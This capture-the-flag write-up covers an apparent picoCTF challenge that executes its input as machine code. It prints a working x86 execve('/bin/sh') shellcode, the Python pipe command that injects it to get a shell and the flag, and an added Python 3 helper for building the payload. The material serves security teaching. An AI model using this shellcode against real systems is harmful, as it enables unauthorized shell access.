Created: 2014-11-09 13:07:47
Last modified: 2014-11-17 20:58:07
This program will run whatever you send to it! Try to get the flag! The binary can be found at
/home/execute/ on the shell server. The source can be found here.
You can get the flag in a number of ways, but the easiest would be to run a shell.
Use the program to execute some shellcode.
Let's start by running the program on the server. When we run it and enter
/bin/sh the following appears:
[email protected]:~$ cd /home/execute/
[email protected]:/home/execute$ ./execute /bin/sh
Segmentation fault (core dumped)
[email protected]:/home/execute$
Huh, that's not good. Looking a little closer at the code we see this:
read(0, buf, 128);       /* read up to 128 bytes from stdin into buf */
((function_ptr)buf)();   /* jump to buf and execute its contents as code */
So the program reads our input into a buffer and then executes it. It is not handing the buffer to
system() to run a shell command, as we might expect; instead it jumps into the buffer and executes whatever machine code we put there. The hint tells us to run a shell, so we should use
shellcode. Shellcode is typically given as a string of hex bytes that, when executed, perform some task such as running
/bin/sh. Many websites provide shellcode, such as shell-storm. For now, let's use this shellcode to run
[email protected]:/home/execute$ ./execute \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Segmentation fault (core dumped)
[email protected]:/home/execute$
Huh, that still didn't work. Our next task is to
pipe the raw bytes into the program instead of typing the escapes in. Right now, the shell passes
\x31 as 4 separate ASCII characters (\, x, 3, 1) instead of the single byte with ASCII value
0x31 (or 49 in base 10). To do this we can use Python:
[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute
[email protected]:/home/execute$
This uses Python to print our hex characters into the program. Note the use of a
" to encapsulate the Python code and the
' to encapsulate the
cat to the end of our Python command, which prevents this.
[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute
whoami
pico89244
cat flag.txt
shellcode_is_kinda_cool
Our shell runs successfully and we get our flag!
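As an added example (not the writeup author's code), here is a Python 3 script that shows at the byte level why the piped form works and the command-line form does not, plus a caveat for anyone reproducing the writeup today: Python 2's print resolved the escapes and appended a newline, while Python 3's print would UTF-8 encode the high bytes. The constant and function names are mine.

```python
"""Byte-level view of the payload delivery in the writeup above.

Added example, not part of the original writeup. It assumes only what the
page shows about the target: read(0, buf, 128) followed by a jump into buf.
"""

# The 21-byte execve("/bin/sh") shellcode from the writeup, as the escaped
# text a user would type. The constant names here are my own.
SHELLCODE_ESCAPED = (
    r"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    r"\x89\xe3\xb0\x0b\xcd\x80"
)
BUF_SIZE = 128  # the count passed to read() in the challenge source


def literal_argv_bytes(text: str) -> bytes:
    """What the shell hands over when the escapes are typed on the command
    line: the four characters '\\', 'x', '3', '1', not the single byte 0x31.
    This is why the second attempt in the writeup still segfaulted."""
    return text.encode("ascii")


def escapes_to_bytes(text: str) -> bytes:
    """Resolve each \\xNN escape to one byte, as Python 2's parser did inside
    the author's python -c "print '...'" command."""
    return text.encode("ascii").decode("unicode_escape").encode("latin-1")


def python3_print_bytes(raw: bytes) -> bytes:
    """What Python 3's print() would emit for the same string literal: every
    byte >= 0x80 (such as \\xc9) becomes two UTF-8 bytes, so the instruction
    stream the target jumps into is no longer the intended shellcode."""
    return raw.decode("latin-1").encode("utf-8")


def payload_fits(raw: bytes) -> bool:
    """read(0, buf, 128) silently truncates anything longer than BUF_SIZE."""
    return len(raw) <= BUF_SIZE


def build_stdin_payload(raw: bytes) -> bytes:
    """Reproduce what Python 2's print sent down the pipe: the raw bytes plus
    a trailing newline. The newline is harmless here because it lands after
    int 0x80, and a successful execve never returns to execute it."""
    if not payload_fits(raw):
        raise ValueError(f"{len(raw)} bytes exceeds the {BUF_SIZE}-byte read")
    return raw + b"\n"
```

Under Python 3, send the bytes with sys.stdout.buffer.write(build_stdin_payload(escapes_to_bytes(SHELLCODE_ESCAPED))) rather than print; the "; cat" in the writeup's final command keeps the pipe open so the spawned shell's stdin does not hit end-of-file.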